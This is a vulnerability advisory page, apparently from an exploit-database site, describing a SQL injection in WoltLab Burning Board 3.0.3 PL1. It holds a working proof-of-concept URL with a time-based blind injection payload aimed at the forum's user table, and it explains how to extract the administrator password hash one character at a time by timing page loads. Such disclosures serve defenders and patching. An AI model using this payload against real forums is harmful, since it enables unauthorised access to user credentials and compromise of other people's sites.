WoltLab Burning Board 3.0.3 PL1 SQL-Injection Vulnerability

2008.02.21
Credit: nbbn
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

######################################################################## ###################### WoltLab Burning Board 3.0.3 PL1 SQL Injection Vulnerability by NBBN Vendor: http://woltlab.de ######################################################################## ###################### ::Proof of Concept http://site.tld/wbb3/index.php?page=PMList&folderID=0&pageNo=1&sortField =isViewed&sortOrder=ASC, (SELECT password FROM wcf1_user WHERE userID=1 AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1)) An attacker should have to register at the board to use this. You can ask TRUE/FALSE questions to the database. Modify 3000000 if the stuff doesn't work. On some MySQL Versions you need to edit this query ::Explain: ...AND IF(ORD(SUBSTR(password,1,1))>55,BENCHMARK(3000000,MD5(23)),1)) 1,1 is the position in the crypted password. 55 is the char in the ascii-table. In this example we ask for number 7 in the hash, position 1. If the page load fast, you find a true char. If not, ask other chars ;-).If you enter a char that is higher then the true's, the page load fast to, so start from 48 first and go higher. ::Vulnerabiltiy As I found this, WBB 3.0.4 was only running at the supportforums of woltlab so I don't test it, because there is no reason and I am not a cracker ;-) WoltLab Burning Board 3.0.3 PLX WoltLab Burning Board 3.0.2 PLX WoltLab Burning Board 3.0.1 PLX WoltLab Burning Board 3.0.0 PLX Possible WoltLab Burning Board 3.0.4 (not tested)... Please don't use this to crack forums. All what you do with this is at your own risk.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top